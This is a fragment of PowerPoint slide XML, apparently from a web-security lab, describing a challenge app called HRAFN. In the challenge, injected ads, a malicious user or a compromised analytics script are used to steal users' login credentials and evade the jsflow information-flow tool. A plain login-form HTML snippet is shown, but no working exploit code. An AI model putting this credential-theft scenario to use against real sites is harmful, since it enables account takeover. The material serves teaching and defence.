            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Bildobjekt 26" descr="imgre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669" y="5775193"/>
            <a:ext cx="1513259" cy="455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Bildobjekt 27" descr="imgres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60" b="8520"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4086504" y="5775193"/>
            <a:ext cx="1203752" cy="455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textruta 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3755002" y="5828773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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Rak pil 34"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2829431" y="5330042"/>
            <a:ext cx="0" cy="3764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Rak pil 38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4365988" y="5319768"/>
            <a:ext cx="0" cy="3867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Rak pil 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4827510" y="3574374"/>
            <a:ext cx="0" cy="21321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7" name="Bildobjekt 36" descr="search.png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57" y="2189896"/>
            <a:ext cx="504000" cy="50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2" name="Bildobjekt 41" descr="imgres.jpg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57" y="3290585"/>
            <a:ext cx="502123" cy="50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Bildobjekt 42" descr="images.jpg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8889" b="89778" l="0" r="100000">
                        <a14:foregroundMark x1="61333" y1="40000" x2="61333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967" y="3595860"/>
            <a:ext cx="853661" cy="853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4" name="Bildobjekt 43" descr="Cloud-Hosting-4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567" y="2189896"/>
            <a:ext cx="831354" cy="831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undad rektangulär 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7298521" y="2903708"/>
            <a:ext cx="1591479" cy="894507"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42403"/>
              <a:gd name="adj2" fmla="val -77501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Persistent message store</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Rundad rektangulär 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6638121" y="4555330"/>
            <a:ext cx="1591479" cy="524781"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -34423"/>
              <a:gd name="adj2" fmla="val -9251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OAUTH login</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Rundad rektangulär 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3557895" y="2078261"/>
            <a:ext cx="1604077" cy="391177"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 26091"/>
              <a:gd name="adj2" fmla="val 97497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localhost:5000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Rundad rektangulär 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="978850" y="4158976"/>
            <a:ext cx="1604077" cy="391177"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 39177"/>
              <a:gd name="adj2" fmla="val 100180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localhost:4999</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Rundad rektangulär 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4888490" y="5134453"/>
            <a:ext cx="1604077" cy="391177"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -51769"/>
              <a:gd name="adj2" fmla="val -8764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localhost:4888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66733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challenge – attack raven</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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80999" y="1719071"/>
            <a:ext cx="8407893" cy="478861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We want to simulate a situation where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rogue ads are injected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another user is malicious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(the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>analytics service has been compromised or is otherwise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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We are in control of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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ontents of ads – allows us to inject HTML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another user account – allows us to inject HTML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(the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>analytics server – allows us to inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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Our task is to steal the credentials of users that log in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Can we get past </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsflow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26418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Inside HRAFN </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Bildobjekt 6" descr="Screen Shot 2015-08-06 at 15.20.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207" y="1502147"/>
            <a:ext cx="7162800" cy="5594692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Platshållare för innehåll 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2313583" y="3122226"/>
            <a:ext cx="6539394" cy="302142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050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="pure-form pure-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>aligned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="post" action="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="105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sv-SE" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>legend&gt; &lt;/legend&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="105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sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>   &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>fieldset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="105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sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>       &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="pure-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="105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sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>           &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="text" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>placeholder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="105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sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>       &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/div&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="105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sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="pure-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="1050" b="1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sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>           &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>placeholder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="1050" b="1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sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>       &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/div&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="1050" b="1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sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>       &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="pure-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="105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sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> id="login" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="1050" b="1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sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="pure-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> pure-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>primary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt;Sign in&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="105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sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>       &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/div&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="105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sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>   &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>fieldset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
